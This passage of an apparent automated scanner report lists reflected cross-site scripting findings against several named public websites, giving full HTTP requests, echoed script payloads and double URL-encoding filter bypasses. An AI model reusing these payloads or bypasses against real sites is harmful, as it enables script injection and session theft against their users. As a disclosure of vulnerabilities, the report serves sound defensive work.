Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 77733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?7176a"><script>alert(1)</script>129891fa40c=1&pg=1">
...[SNIP]...

4.95. http://www.diggita.it/submit.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diggita.it
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fce1b"><script>alert(1)</script>c501a948188 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.phpfce1b"><script>alert(1)</script>c501a948188 HTTP/1.1
Host: www.diggita.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:21:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=67c03560314d0d10e9be0bd654435e86; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" xmlns:fb
...[SNIP]...
<fb:login-button v="2" onlogin="window.location.href='/modules/fb/login.php?return=/submit.phpfce1b"><script>alert(1)</script>c501a948188'">
...[SNIP]...

4.96. http://www.diggita.it/submit.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diggita.it
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ffb6"><script>alert(1)</script>5c2ce711f18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?5ffb6"><script>alert(1)</script>5c2ce711f18=1 HTTP/1.1
Host: www.diggita.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=ccd9b1d9e9471da4ea8841848718301e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" xmlns:fb
...[SNIP]...
<fb:login-button v="2" onlogin="window.location.href='/modules/fb/login.php?return=/login.php?return=/submit.php?5ffb6"><script>alert(1)</script>5c2ce711f18=1'">
...[SNIP]...

4.97. http://www.embarkons.com/sharer.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12956<img%20src%3da%20onerror%3dalert(1)>9574d4dbe79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12956<img src=a onerror=alert(1)>9574d4dbe79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/12956<img%20src%3da%20onerror%3dalert(1)>9574d4dbe79 HTTP/1.1
Host: www.embarkons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:50 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=oe5lalcmiqfs2uf70pbbndtm97; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:14:50 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">12956<img src=a onerror=alert(1)>9574d4dbe79</div>
...[SNIP]...

4.98. http://www.embarkons.com/sharer.php/a [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/a

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87967<img%20src%3da%20onerror%3dalert(1)>88c35fcade8 was submitted in the REST URL parameter 2. This input was echoed as 87967<img src=a onerror=alert(1)>88c35fcade8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/a87967<img%20src%3da%20onerror%3dalert(1)>88c35fcade8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:50 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:51 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">a87967<img src=a onerror=alert(1)>88c35fcade8</div>
...[SNIP]...

4.99. http://www.embarkons.com/sharer.php/images/close-icon.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/close-icon.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4bc6e<img%20src%3da%20onerror%3dalert(1)>2f3138d923a was submitted in the REST URL parameter 3. This input was echoed as 4bc6e<img src=a onerror=alert(1)>2f3138d923a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/close-icon.gif4bc6e<img%20src%3da%20onerror%3dalert(1)>2f3138d923a HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">close-icon.gif4bc6e<img src=a onerror=alert(1)>2f3138d923a</div>
...[SNIP]...

4.100. http://www.embarkons.com/sharer.php/images/postit-bulb.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postit-bulb.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6be61<img%20src%3da%20onerror%3dalert(1)>314a004caad was submitted in the REST URL parameter 3. This input was echoed as 6be61<img src=a onerror=alert(1)>314a004caad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/postit-bulb.gif6be61<img%20src%3da%20onerror%3dalert(1)>314a004caad HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:52 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:53 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">postit-bulb.gif6be61<img src=a onerror=alert(1)>314a004caad</div>
...[SNIP]...

4.101. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postitsubmitbtn.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4ef80<img%20src%3da%20onerror%3dalert(1)>f6413b1c94b was submitted in the REST URL parameter 3. This input was echoed as 4ef80<img src=a onerror=alert(1)>f6413b1c94b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/postitsubmitbtn.png4ef80<img%20src%3da%20onerror%3dalert(1)>f6413b1c94b HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">postitsubmitbtn.png4ef80<img src=a onerror=alert(1)>f6413b1c94b</div>
...[SNIP]...

4.102. http://www.embarkons.com/sharer.php/images/search-con.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/search-con.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1832<img%20src%3da%20onerror%3dalert(1)>f94e94396e was submitted in the REST URL parameter 3. This input was echoed as e1832<img src=a onerror=alert(1)>f94e94396e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/search-con.gife1832<img%20src%3da%20onerror%3dalert(1)>f94e94396e HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:54 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">search-con.gife1832<img src=a onerror=alert(1)>f94e94396e</div>
...[SNIP]...

4.103. http://www.embarkons.com/sharer.php/src/captcha.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 57a50<img%20src%3da%20onerror%3dalert(1)>9823491c1f8 was submitted in the REST URL parameter 3. This input was echoed as 57a50<img src=a onerror=alert(1)>9823491c1f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/src/captcha.php57a50<img%20src%3da%20onerror%3dalert(1)>9823491c1f8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:58 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">captcha.php57a50<img src=a onerror=alert(1)>9823491c1f8</div>
...[SNIP]...

4.104. http://www.embarkons.com/sharer.php/src/captcha.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4c1f1<img%20src%3da%20onerror%3dalert(1)>7a467385bc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c1f1<img src=a onerror=alert(1)>7a467385bc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/src/captcha.php/4c1f1<img%20src%3da%20onerror%3dalert(1)>7a467385bc8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:55 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">4c1f1<img src=a onerror=alert(1)>7a467385bc8</div>
...[SNIP]...

4.105. http://www.favlog.de/submit.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.favlog.de
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b394"%20style%3dx%3aexpression(alert(1))%203927ed65879 was submitted in the REST URL parameter 1. This input was echoed as 4b394\" style=x:expression(alert(1)) 3927ed65879 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit.php4b394"%20style%3dx%3aexpression(alert(1))%203927ed65879 HTTP/1.1
Host: www.favlog.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:17 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k mod_jk/1.2.26 PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=9ccdeh3nqm7lod25rvsqul5or5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18450


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<a href="/upcoming/submit.php4b394\" style=x:expression(alert(1)) 3927ed65879">
...[SNIP]...

4.106. http://www.gabbr.com/submit/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gabbr.com
Path:   /submit/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 48e8d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3a4c354593 was submitted in the REST URL parameter 1. This input was echoed as 48e8d</title><script>alert(1)</script>c3a4c354593 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /submit48e8d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3a4c354593/ HTTP/1.1
Host: www.gabbr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2a3c686927d5809dba33b96974e73b08; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 35636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<title>Gabbr.com: Submit48e8d</title><script>alert(1)</script>c3a4c354593</title>
...[SNIP]...

4.107. http://www.gametrailers.com/remote_wrap.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gametrailers.com
Path:   /remote_wrap.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217ce%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9c0af3ddee0 was submitted in the REST URL parameter 1. This input was echoed as 217ce"><img src=a onerror=alert(1)>9c0af3ddee0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /remote_wrap.php217ce%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9c0af3ddee0 HTTP/1.1
Host: www.gametrailers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Pragma: akamai-x-cache-on
Accept-ESI: 1.0
X-GT-Cache-Key: s=_404_php,r=_remote_wrap_php217ce_22_3e_3cimg_20src_3da_20onerror_3dalert_281_29_3e9c0af3ddee0,key=remote_wrap.php217ce%22%3e%3cimg%20src%3da%20onerror%3dalert%281%29%3e9c0af3ddee0
Content-Type: text/html
Cache-Control: max-age=1200
Date: Sun, 17 Apr 2011 14:15:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-detected=no; expires=Sun, 17-Apr-2011 20:15:10 GMT; path=/
Vary: User-Agent
Content-Length: 34633

<!DOCTYPE html public "-//w3c//dtd html 4.01 transitional//en"
"http://www.w3.org/tr/html4/loose.dtd">
   <html>

<head>
   <title>404 - Video Game Trailers for Wii, PSP, Xbox, PS3 & More | Upcoming
...[SNIP]...
<script type="text/javascript" src="/ui/php/inc.php?uri=/remote_wrap.php217ce"><img src=a onerror=alert(1)>9c0af3ddee0">
...[SNIP]...

4.108. http://www.gillmanauto.com/smartbrowse/ajax/used.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 3025a</noscript><script>alert(1)</script>81d6fe8ab38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse3025a</noscript><script>alert(1)</script>81d6fe8ab38/ajax/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=true&showBodyStyle=true&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.gillmanauto.com
Proxy-Connection: keep-alive
Referer: http://www.gillmanauto.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
